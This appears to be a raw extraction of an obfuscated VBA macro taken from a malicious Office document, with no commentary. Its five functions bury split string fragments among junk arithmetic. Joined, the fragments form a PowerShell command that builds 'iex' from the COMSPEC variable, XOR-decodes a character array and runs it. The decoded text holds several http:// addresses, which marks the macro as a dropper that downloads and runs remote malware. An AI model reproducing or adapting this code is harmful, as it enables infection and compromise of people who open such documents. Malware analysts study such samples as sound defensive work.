Filename     : ./macros/eb4b9c1ca396301ee56b7934a9da30940ff3918b4fadb782e5574b7d56af64d1
OLE stream   : Macros/VBA/HPwzXruwMs
VBA filename : HPwzXruwMs.bas
----------------------------------------
Attribute VB_Name = "HPwzXruwMs"
Function pHPzLoM()
On Error Resume Next
jbzJa = 86690 / 52413
jjLmlC = 47982 + 35508
oMmbJ = HoLkHu
wWUACJ = Atn(fMdtu + Sin(tAzBkh) - 40252 / 99594)
JkTaZC = LjfOmU * CSng(46074 * Fix(9640)) * dqwdS + CSng(UtUoC + CLng(EBNbq)) / (ckZfTb * CSng(55466) - (32188 + Fix(MOILI) - (12948 + CLng(HMcpN - Log(QZFkAf) - 13196 + Int(SnvWvU)))))
WsWBsE = "ell  &( $eN" + "v:COmspec[4" + ",15,2" + "5]-joIN'')(((" + "98" + ", 41,45,51 ,9" + ", 7" + " , 102 ,123 ,10" + "2 ,40,"
vsspv = 26942 / 12757
HGkWlS = 76643 + 87729
ZPfqJ = DASEGT
TZwHdb = Atn(wUOlJ + Sin(jZmTrn) - 78414 / 66605)
NzsYmt = sjPEw * CSng(78587 * Fix(64055)) * IjKrN + CSng(zNFfb + CLng(Mnoan)) / (Bwnik * CSng(6431) - (27183 + Fix(TAsquS) - (48442 + CLng(OCHwjN - Log(lnsKY) - 80513 + Int(uoQfm)))))
llzDjNiYwSu = "35, 49 " + ", 107 ,41, 36" + ", 44 ," + " 35,37 ," + "50," + "102,52 ,39 ,40" + ", 34,41 ,43,1"
GIAZN = 4574 / 65601
YHBdG = 61626 + 14516
mTunb = wTkVG
wwOjbn = Atn(uKTmjn + Sin(TnJmbj) - 98657 / 26301)
ZswzS = GOofsq * CSng(31722 * Fix(79410)) * dEakj + CSng(YihPk + CLng(kqMph)) / (iAXhqq * CSng(17801) - (93171 + Fix(iYOdAj) - (73152 + CLng(YfvYC - Log(JQkhI) - 43365 + Int(cqKrh)))))
idJAbLIiIbj = "25, 98 , 19," + " 1 ," + " 4" + "8,60,8 , "
cHjkBF = 96612 / 23270
zwwUYE = 77571 + 62260
lwAUjn = RjZdH
hdwoIv = Atn(saSJdr + Sin(JcEovD) - 67904 / 55037)
PBpkf = aaNTr * CSng(54289 * Fix(28516)) * QtKrd + CSng(TqLsO + CLng(HKfBI)) / (BjWSE * CSng(4630) - (92621 + Fix(VsXBP) - (43932 + CLng(wibNNK - Log(EZpzW) - 21536 + Int(QuLKd)))))
jjIMzrfDJ = "102 ,123, 102 " + ", 4" + "0 ,35, 49 " + ", 107,41,36 ," + " 44,35 ,37 , 50" + " ,10" + "2, 21, 63 , 53," + " 50, 35 , " + "43 , " + "104 ,8"
uoKBIt = 31795 / 64611
UiZrnq = 45276 + 28736
YvszAQ = iNuKJ
BiLGXL = Atn(wnhKS + Sin(HWiAr) - 9912 / 45136)
rFhVhc = ZncGR * CSng(84027 * Fix(91169)) * osRjiU + CSng(wovmB + CLng(KRHoc)) / (FvmOF * CSng(55116) - (13564 + Fix(mBBOc) - (67714 + CLng(CvZokG - Log(Gsauaz) - 30173 + Int(URpjq)))))
GnbZaHmAoYi = ", 35 , 50 ,104," + " 17,35 , 36 , 5" + ",42,47 ," + " 35" + " ,40 , 5"
flRQzO = 52627 / 24844
skIbI = 98867 + 72681
bkWnN = Lpkzn
iNfIoi = Atn(IjpKFJ + Sin(kXfRGD) - 38987 / 45612)
wbSCH = BEORGP * CSng(9018 * Fix(15798)) * ZaGFV + CSng(dKMip + CLng(asjlRv)) / (aUavt * CSng(50466) - (23686 + Fix(wdEuAk) - (41194 + CLng(BBtQzU - Log(FXSva) - 22753 + Int(jpTnhu)))))
pHdVXm = "0 ,125 , 9" + "8,5," + " 17 , 42,4" + "5, 30, 32, 1"
KHihbS = 11205 / 19767
kVCCvR = 77521 + 41773
zwKAC = fwWEn
wwlRoS = Atn(EwRYl + Sin(CoVbQ) - 26016 / 96412)
qiHmAW = OjuIc * CSng(14160 * Fix(57283)) * IwJXF + CSng(TXjzu + CLng(PNBwn)) / (bkFPAN * CSng(71282) - (78465 + Fix(ADfBdr) - (57294 + CLng(zIRPLX - Log(XpGGH) - 851 + Int(zVkfsS)))))
PKiAsNiTzm = "02 , " + "123 , 102,97" + " ,46, 50, 50," + "54, 124 ,10" + "5,10"
pHPzLoM = WsWBsE + llzDjNiYwSu + idJAbLIiIbj + jjIMzrfDJ + GnbZaHmAoYi + pHdVXm + PKiAsNiTzm
End Function
Function EUCjBZKB()
On Error Resume Next
fXzANp = 84147 / 78893
tohWj = 62626 + 16596
pnkAL = zaqSlS
kTiFS = Atn(jElAE + Sin(pPjERB) - 50077 / 25622)
JOfUBl = HkMAOt * CSng(61775 * Fix(37650)) * aSzcqc + CSng(IKZRSw + CLng(ulzKG)) / (TqzRWX * CSng(27938) - (19349 + Fix(ZZNVH) - (91961 + CLng(hfJjV - Log(KcTWK) - 48328 + Int(PQjZk)))))
MnCYa = "5, 54 ,41 , " + "53, 47 ," + "50 , 47 ,4" + "8,35, 3" + "6 , 51 ,5"
LrXzIQ = 55808 / 31526
cPYVK = 72340 + 21163
LhJLP = wcODoX
nqWaOh = Atn(JdiPLY + Sin(XAmwQ) - 20389 / 15732)
hzXKEw = FFZrPc * CSng(19350 * Fix(32023)) * oDmEr + CSng(HbiGv + CLng(bsfGiI)) / (oMqGw * CSng(27939) - (40533 + Fix(ttCwRw) - (22977 + CLng(GzGIWr - Log(fwADdN) - 87851 + Int(lTBcAw)))))
mBwMPrGt = "3 ,47 , 40" + " ,35 ,53 " + ", 53 ,47 " + ", " + "43 , 39,3" + "3 , 35 ,53 ," + "104, 37, " + "41" + " , 43 , "
EzHOdt = 69442 / 71414
NBUiN = 37591 + 29434
mhnJIi = dFURK
aXFwGM = Atn(LQiUz + Sin(uzDbi) - 89736 / 24761)
jnoqii = PZLjN * CSng(23404 * Fix(7803)) * PvINqT + CSng(HTard + CLng(idDJB)) / (ctUUkI * CSng(88514) - (26350 + Fix(sIKIJX) - (9620 + CLng(FFZMhj - Log(QnAfk) - 91904 + Int(XLVck)))))
lSWGV = "105 ,12 , 12," + " 4, 28,116,45 " + ", 105, 6,46,50" + " ,50 ,54" + " , 124, 105" + " ," + " 105 , 4" + "9,49 ,49 , 104" + ", 46 , 41,42 ,"
EWafwT = 48488 / 65275
EjjKBK = 37479 + 69301
iIHXrS = PhWhUE
wHBDv = Atn(HDWjh + Sin(YbiBd) - 58427 / 87001)
hXwVaw = cTiZRw * CSng(74013 * Fix(23528)) * lPDwY + CSng(uoEsbi + CLng(rZROw)) / (PMnIC * CSng(91300) - (56157 + Fix(nkiIt) - (38520 + CLng(QuQlRH - Log(IQhWzK) - 53321 + Int(IDzmw)))))
zcJOjQG = " 41, 3" + "4, 116, 114" + " , 104" + " , 36, 63, "
CNizGc = 42967 / 25973
wplmAa = 13177 + 51016
FRQYzb = wDTbY
ktUOd = Atn(XaEZQ + Sin(hYAYZh) - 43959 / 87625)
sJwbj = HcAZb * CSng(85090 * Fix(51495)) * qjJqm + CSng(ILSzcc + CLng(LjYHVE)) / (ONsqGt * CSng(51125) - (87776 + Fix(ucBXPu) - (10011 + CLng(jUfNhq - Log(zEfwvb) - 35353 + Int(onKdo)))))
pDiIKpDXqT = "105" + " ,19 ,53" + ", 46, 63, 10" + "5 ,6 ,46 , 50" + ",50" + ", 54,124" + " , 105 ,"
XcvWJq = 93598 / 64636
FfTtu = 10857 + 29808
rTWNCH = CVmEKB
dtszj = Atn(GVWSVc + Sin(kwjcI) - 86016 / 72963)
dGuci = qQXvAN * CSng(39446 * Fix(39560)) * KJYZOa + CSng(DRRBHw + CLng(NiQwWb)) / (VwRvU * CSng(66059) - (62688 + Fix(aLflj) - (17271 + CLng(VjBmzC - Log(KjXrmK) - 26404 + Int(PwsopN)))))
OjDNlph = " 1" + "05, 49, 4" + "9, 49, 10" + "4,47, 40 " + ",50"
kdPBXi = 73909 / 31407
RhAzS = 28474 + 31387
ffhtDV = tmFEX
rzoUnD = Atn(GOOHaA + Sin(lThBtM) - 58519 / 59665)
wbXFQw = XzJodb * CSng(2352 * Fix(11865)) * iopZnG + CSng(aWEipI + CLng(iScMXv)) / (wqzcwm * CSng(89809) - (43308 + Fix(zQbBR) - (56900 + CLng(qsptz - Log(MSlOIf) - 41068 + Int(OdKJl)))))
UrzdmNvJV = ", 35,52 ,43" + " , 35,45 , 3" + "9,50,52" + ", 41,40 ,47 , 4" + "5 ,104 , 37 ,41" + ",43 ,10" + "5, 37 , 22, 15" + " ,36 , 37 "
RizXk = 91878 / 26680
iicPv = 93107 + 16974
vrjEBA = QOEAHi
qFRjM = Atn(Pszul + Sin(bIlIF) - 88798 / 21833)
YTMGE = XCaYbz * CSng(29689 * Fix(88799)) * LsQLv + CSng(aYaTcv + CLng(ZInqHb)) / (LUmzf * CSng(66793) - (83015 + Fix(jcZro) - (18564 + CLng(WfkNQ - Log(umnbum) - 56342 + Int(llqnm)))))
FZcHhDzNaKi = ",105, 6,46,5" + "0 , 50 ,54 ," + " 124 , 105, 1" + "05 , 4" + "9 , 4" + "9,4" + "9 , 104 ,1" + "13 ,104,39, " + "34 , 36 ,41, " + "52 , 41 ,"
VfFJI = 21122 / 4817
otqnL = 40054 + 62249
FblKD = TWBJp
hSQKZ = Atn(KqNINX + Sin(OwGBj) - 58771 / 70195)
jwcdrH = tvQuV * CSng(93606 * Fix(13241)) * hFaiU + CSng(AtDaOu + CLng(hwjtN)) / (KnbXI * CSng(35336) - (19876 + Fix(JjNNF) - (63955 + CLng(IilmLi - Log(CYCdMA) - 23612 + Int(hBHiwX)))))
fDUjfJVXK = " 34, " + "104,60 , 126" + ",104" + " , 52, 51 ,105" + ",55, 54"
EUCjBZKB = MnCYa + mBwMPrGt + lSWGV + zcJOjQG + pDiIKpDXqT + OjDNlph + UrzdmNvJV + FZcHhDzNaKi + fDUjfJVXK
End Function
Function LMQKvJo()
On Error Resume Next
GEHhu = 9017 / 95213
ipUzco = 68585 + 66274
YlNZzt = mFmwo
TbwYzi = Atn(HPwYiR + Sin(GQGtL) - 82737 / 53422)
GvRnCM = KARfHi * CSng(15506 * Fix(64284)) * NUOfkA + CSng(prTfK + CLng(hUbUQ)) / (jTXAnj * CSng(22569) - (1548 + Fix(JkEhmX) - (29680 + CLng(UDKFV - Log(vihbET) - 94710 + Int(nNIBJ)))))
dkdIdjFF = " ," + "60, 1" + "2 ,11 , 126" + ", 18,105,6" + ", 4"
uZQoBK = 99833 / 93028
iDVBw = 96507 + 43244
rbbbq = GnbszS
ZhEpDz = Atn(YZIDPj + Sin(WDVRwh) - 58722 / 47189)
PpSOB = uRSnb * CSng(18274 * Fix(46230)) * mUsBNM + CSng(nYunw + CLng(AljwG)) / (kJwvKz * CSng(45745) - (18707 + Fix(nzUiv) - (16031 + CLng(AJulJ - Log(bRXaCz) - 87586 + Int(mpUinQ)))))
iEhrpoNtci = "6,50,50,54" + " , 124," + " 105, " + "105, 5" + "3, 39,4"
wRHmJ = 34068 / 77892
iKvPlz = 32735 + 82665
ZXvLFC = jOBASV
hRjtrj = Atn(HDLrjC + Sin(SAaZi) - 60475 / 81291)
LAzJPn = wOaMw * CSng(45735 * Fix(14589)) * vNZLJ + CSng(lbRvr + CLng(smYAf)) / (IQbij * CSng(62087) - (37267 + Fix(diXGDK) - (5412 + CLng(TYZFhc - Log(ZfOYh) - 36239 + Int(pZjfP)))))
UnnSRWEwdIB = "0 , 50 " + ",3" + "5 , 4" + "6," + "40 , 47 , 45, 3" + "9 ,107 , 45 , 4"
jbuIY = 21340 / 5558
WsiNs = 78748 + 98261
fHNHi = qvwGt
hYjjz = Atn(DqZRw + Sin(HVjwUt) - 41381 / 20109)
zjBfS = lFWLT * CSng(12331 * Fix(73708)) * krwQJ + CSng(LhfYji + CLng(PHvYzw)) / (aLJaj * CSng(54750) - (90402 + Fix(ipzOh) - (4424 + CLng(mPcfF - Log(PEdzoT) - 42493 + Int(bmTHUu)))))
BaQRBEXd = "1, 46 , 42, 35," + " 52 ,104 ,52 " + ",51 ,105 , 5" + "3 , 63 , 53 , 5" + "0 ,35, " + "43 , 105, "
qmrfp = 48691 / 69003
OEhsa = 28007 + 54286
uTAwF = diwHzi
UMHMw = Atn(vHZmRS + Sin(trUXD) - 45542 / 3598)
pzOwjS = zmYar * CSng(1148 * Fix(76040)) * KjkYQq + CSng(Vnbws + CLng(tChKiI)) / (fsOXQ * CSng(7116) - (87013 + Fix(afCLa) - (19815 + CLng(JqpLE - Log(ibXlZY) - 7465 + Int(qPIsaN)))))
UzLTp = "46,35 ," + "42,54, 35 " + ", 52, 105,114, " + "54,13,1 ,49 ," + "105,97, 104"
OlJAv = 95309 / 11597
wwHFh = 81821 + 97455
rVwFqX = EvhzhL
LuMUHw = Atn(vVZHtp + Sin(zBLwnU) - 83939 / 4180)
loDLAd = QhHSLr * CSng(59609 * Fix(37173)) * VQFOm + CSng(waSzs + CLng(jZHilU)) / (fzkEK * CSng(4555) - (34383 + Fix(AfXcT) - (60894 + CLng(jQljJM - Log(csClnj) - 15030 + Int(jaWWoU)))))
hoqvnomH = " ,21" + ", 54 , 42 , 47," + "50,11" + "0 , 97 ,6 ,97" + ", 111 ,125, 98" + " ,0,0 , 1, 3" + "9 , 22" + " , 102," + " 123 ,102,9"
Uwusa = 96530 / 60237
nRJmYK = 48919 + 2184
MnhurX = RKFmiu
DQmrDu = Atn(dTiQT + Sin(dHqjGF) - 12471 / 24178)
tJVzj = wzzPcQ * CSng(46221 * Fix(83680)) * GdWsrm + CSng(UNjzrr + CLng(YvXqV)) / (vVaFG * CSng(99251) - (66474 + Fix(SjPPaX) - (60804 + CLng(ohJOzo - Log(OlHEp) - 48180 + Int(EZDmq)))))
jYwQLSLQNHY = "8, 41" + ",45,51 ,9 ,7" + " ,104 , 40,35" + ", 62 ,50,110 , " + "119, 1" + "06, 102" + ", 113,11" + "6, 112, 116 , 1" + "13 , 116 , 11"
LMQKvJo = dkdIdjFF + iEhrpoNtci + UnnSRWEwdIB + BaQRBEXd + UzLTp + hoqvnomH + jYwQLSLQNHY
End Function
Function aKOzXtfoQn()
On Error Resume Next
UzPzjZ = 79308 / 21318
qlMvM = 26886 + 87180
YTjkC = dqZsj
uwNlAA = Atn(vJEVIw + Sin(QXida) - 92557 / 56661)
hjZrwn = LTEwdW * CSng(56541 * Fix(73214)) * lkuOwz + CSng(hRRIJ + CLng(flRwPF)) / (UAaIUz * CSng(73107) - (65731 + Fix(QjMzcJ) - (55431 + CLng(iziPr - Log(iinioS) - 63239 + Int(GXoOlJ)))))
idcOwj = "1 ," + "125 , 9" + "8 , 2, 44 ," + "47,12 , 47, 23" + " ,102, 123"
LuUpF = 18250 / 6756
aSKiPq = 280 + 11702
lVnmV = rzEzQ
vLmzzw = Atn(WRXLIj + Sin(kFrDi) - 7810 / 93094)
KNJNbP = BRMGw * CSng(82245 * Fix(93632)) * ShNCEn + CSng(DuCui + CLng(RTjpF)) / (NGWWbE * CSng(13861) - (79133 + Fix(jcfjW) - (41133 + CLng(idzBz - Log(JOLhk) - 34255 + Int(wdRtOi)))))
fViAAdbBSJz = " , 102" + ", 98, 35 , 40 " + ",48 , 12" + "4 ,50 , 35 ,43," + " 5" + "4, 102," + "109, 102 ,97 "
kvjtjX = 19715 / 50135
znVcij = 25777 + 44523
oGJtKp = lnJFaA
PWBYGp = Atn(WtlVS + Sin(XECjRX) - 10062 / 92071)
qjimn = sdHsjT * CSng(11696 * Fix(73240)) * VwfNOs + CSng(inJKXY + CLng(GWwjlu)) / (IAhXzV * CSng(93796) - (12989 + Fix(TrBfGl) - (6919 + CLng(IhrFrc - Log(bTlAWn) - 74939 + Int(rFMwz)))))
rPOJRfsi = ", 2" + "6 ,97 ,102," + "109 ," + " 102, 98 , 0 ," + " 0, " + "1 ,39 ,"
jNmZDp = 28668 / 65688
ErPPoZ = 91557 + 48826
fPAzTH = OGhaXV
dGHFi = Atn(zbRnwh + Sin(uaiaQL) - 58579 / 43344)
ujmFoM = vMSrj * CSng(23903 * Fix(75190)) * tNzjjv + CSng(EkQfCR + CLng(VAwPN)) / (JYjsY * CSng(58169) - (26130 + Fix(HIwsDk) - (41149 + CLng(aPpwDi - Log(pIKro) - 81020 + Int(tQwYV)))))
oinwK = "22," + "102, 109 " + ", 102, 97" + ",104," + "35,62, 35 ,97," + "125 ,32 , " + "41, 52" + ", 35 ,39 ,3" + "7,46,"
CpUaVa = 34061 / 9045
KBvrK = 82014 + 65048
tuzdQa = ajQYT
liJOZw = Atn(WiimIj + Sin(JOUrj) - 20854 / 58512)
qwiWu = IuHMj * CSng(88372 * Fix(35595)) * mwHbq + CSng(EwwWO + CLng(cXHwE)) / (LTYBOz * CSng(25391) - (32288 + Fix(MaNob) - (87527 + CLng(PwkjAf - Log(uCMIs) - 81869 + Int(mIIriz)))))
Ojbotf = "11" + "0, 98 ,43 ,5" + "4, 17 ,30," + "36 ,102,47,40, " + "102" + ", 98,5," + "17 , 42 ,45 " + ", 30 , 32, 111" + ", 61, 50"
aimcAa = 26313 / 46186
VkGbcu = 76842 + 1246
bYRuQ = VSYLvj
powmp = Atn(qOwwOQ + Sin(LlLcjf) - 8111 / 36045)
oOmfU = zbREim * CSng(86908 * Fix(27116)) * itnzQw + CSng(GiZTkT + CLng(zXQvqF)) / (rlFbbI * CSng(97276) - (37958 + Fix(rcWXwj) - (12795 + CLng(jFtIHF - Log(JjhTh) - 25829 + Int(CIwnIi)))))
bznvtElzhZ = ", " + "52, 63" + " ,61 ," + "98 , 19 , 1, 48" + " ,60 ,8,104 , "
JfPdor = 66430 / 62759
FQliRz = 43046 + 8382
LpOibb = dCibFm
zwSShl = Atn(Qwczs + Sin(zQJMh) - 73297 / 33602)
dEuORz = jQAYn * CSng(74873 * Fix(84567)) * RUNGR + CSng(tXKpZ + CLng(qWJQB)) / (wuMzC * CSng(62619) - (41834 + Fix(ruuLz) - (35959 + CLng(aMwjP - Log(VkhjYs) - 57640 + Int(KHjWi)))))
AjCzM = "2,41 , " + "49 , 40 , 42," + "41, 39" + " , 34, 0,47 , 4"
VjYOSv = 36216 / 5748
kjmjF = 2456 + 89151
RLdVWB = iOQCGi
jIhiX = Atn(VWsCvo + Sin(tsAMs) - 65625 / 71280)
kRKnT = pstdj * CSng(19742 * Fix(34257)) * dbWpO + CSng(iHqYXa + CLng(wCLcft)) / (EwToH * CSng(83244) - (77268 + Fix(lzVcm) - (51698 + CLng(KKQmL - Log(cbmPs) - 47754 + Int(qiAEQJ)))))
HUiFW = "2 ,35 ,110, 9" + "8,43" + ",54" + ", 17 ,30 " + ",3" + "6, " + "10" + "4,18 ,4" + "1,21 ,50" + " ,52 ,"
MRowV = 59387 / 75631
UEVzwh = 77075 + 21655
PrDtNQ = YVkns
TAjjB = Atn(SQJTLM + Sin(ZLPkot) - 24744 / 10339)
YdKbJT = zCTwk * CSng(68169 * Fix(21425)) * XqYidR + CSng(VnvDKz + CLng(UVIGcF)) / (LZSOJQ * CSng(99163) - (74024 + Fix(AltncI) - (17555 + CLng(hRpHX - Log(GJHEiz) - 75803 + Int(GGpMQF)))))
ViGrHDpt = " 47, 40 ,33,11" + "0,111,10" + "6 " + ", 102, 98 " + ", 2,44 , 47,12 " + ", " + "47 , 23 ,111, " + "125, 21, 50," + " 39 ,5"
PQlZBz = 67011 / 36494
lWloFu = 80976 + 9579
DfMdj = JFNvz
WPTWiA = Atn(YzRtsa + Sin(XlRAmI) - 84739 / 72222)
WsKRo = uDZnd * CSng(23048 * Fix(6377)) * IFLvK + CSng(SJYMD + CLng(uDKQkz)) / (rVLjvc * CSng(76321) - (56688 + Fix(KAPmh) - (4617 + CLng(itzjsF - Log(TzNMX) - 84121 + Int(JDjTLw)))))
CwcPLaLiv = "2," + "50 , " + "107 ,22" + ",52 ,4"
aKOzXtfoQn = idcOwj + fViAAdbBSJz + rPOJRfsi + oinwK + Ojbotf + bznvtElzhZ + AjCzM + HUiFW + ViGrHDpt + CwcPLaLiv
End Function
Function tSQBjTfIqX()
On Error Resume Next
VijNjZ = 80435 / 97616
TfRRmR = 28971 + 36556
OCOvk = wrRfw
zcDiBi = Atn(AnAuzG + Sin(SMXDQ) - 35437 / 55317)
qFkiD = zawaO * CSng(97553 * Fix(44764)) * uPtEHq + CSng(uzllwl + CLng(IOfTz)) / (MabvcD * CSng(23886) - (59607 + Fix(Ukzwq) - (43960 + CLng(tMHcs - Log(IzwHUc) - 33828 + Int(vvwacU)))))
vAtwzq = "1 ,37 , 35 ," + "53,53, 102,9" + "8 ,2, 44 , 47 " + ",12, 47 , 23 " + ",1" + "25 ," + "36 ,52, 35,"
mYokVM = 32814 / 77045
HafKN = 54394 + 67162
jCwPr = JpAjzh
todEaV = Atn(fLqWm + Sin(SkjCj) - 41556 / 78966)
WLBKwG = uowDK * CSng(79162 * Fix(59195)) * usaiIZ + CSng(wniqO + CLng(DCTwG)) / (wCBEw * CSng(56770) - (65855 + Fix(CTbnT) - (54291 + CLng(kSmtaB - Log(NOjIs) - 24987 + Int(lfGDRf)))))
QlDfFSi = "39 " + ", 45, 1" + "25 ,59, 37" + ", 39, 50 ," + " 37,46 ,"
tMhff = 24881 / 5936
pmGwX = 2952 + 98238
ommDja = EYzFo
kYrqD = Atn(lSiRWB + Sin(NYsTMa) - 40717 / 98840)
XwqoH = pTFIt * CSng(83192 * Fix(81854)) * UpzbF + CSng(NjppH + CLng(jCiXoP)) / (QMGFak * CSng(28144) - (37569 + Fix(uXGqM) - (64495 + CLng(Qwwvc - Log(qGBjXj) - 76123 + Int(hUdCZv)))))
ocLppXj = " 61 , 49 " + ",52 " + ", 47,50," + "35,107 , 46" + " ,41, 53"
uFoFc = 21385 / 72735
PBfDb = 18483 + 52830
IVMdL = ZcNia
iCOSnr = Atn(lZrumG + Sin(roXwS) - 2540 / 69752)
pwaPj = fJXMYP * CSng(11680 * Fix(55868)) * PjhwnO + CSng(cPKliL + CLng(cEDbS)) / (oLozvZ * CSng(91919) - (1667 + Fix(jZMmRP) - (43006 + CLng(LnvAVK - Log(vATGu) - 16121 + Int(nnivD)))))
WOfaQT = " ,50 ,102 ,98 ," + "25, 104 ,3,6" + "2 ,37 , 35, 54 " + ", 50 , " + "47"
mdopOf = 23008 / 9789
VJZUo = 96538 + 56554
TUdEjK = YpQEri
QjzwF = Atn(XzMLf + Sin(FinBoh) - 5947 / 64734)
PjdCId = IdhOY * CSng(99690 * Fix(99778)) * YacwjO + CSng(koaRil + CLng(URihmJ)) / (sJViAQ * CSng(97689) - (60374 + Fix(CSWaB) - (88690 + CLng(ztkUv - Log(cqvWcJ) - 31767 + Int(qNqGjQ)))))
lFdwAAQ = ", " + "41 ,40 ,104 ,11" + ",35, 53,53, " + "39,33 ," + " 35, 125 , 59 "
njQMSL = 10107 / 80320
wiLFC = 22521 + 2816
zWTjnU = LnocU
XpZlw = Atn(OlqBwF + Sin(sQjwt) - 24708 / 1656)
dicdG = GqsLu * CSng(62685 * Fix(84013)) * wAvdO + CSng(rmdnD + CLng(sGDaJ)) / (iurucG * CSng(8296) - (57137 + Fix(wXswC) - (38098 + CLng(lLJZwl - Log(qFoZoQ) - 99620 + Int(SCACzS)))))
qLMIDkkk = ",5" + "9) | FOREAc" + "H{[cHar]" + " ($_-" + "BxOR'0x46')}" + " )-joIN'" + "' )"
tSQBjTfIqX = vAtwzq + QlDfFSi + ocLppXj + WOfaQT + lFdwAAQ + qLMIDkkk
End Function

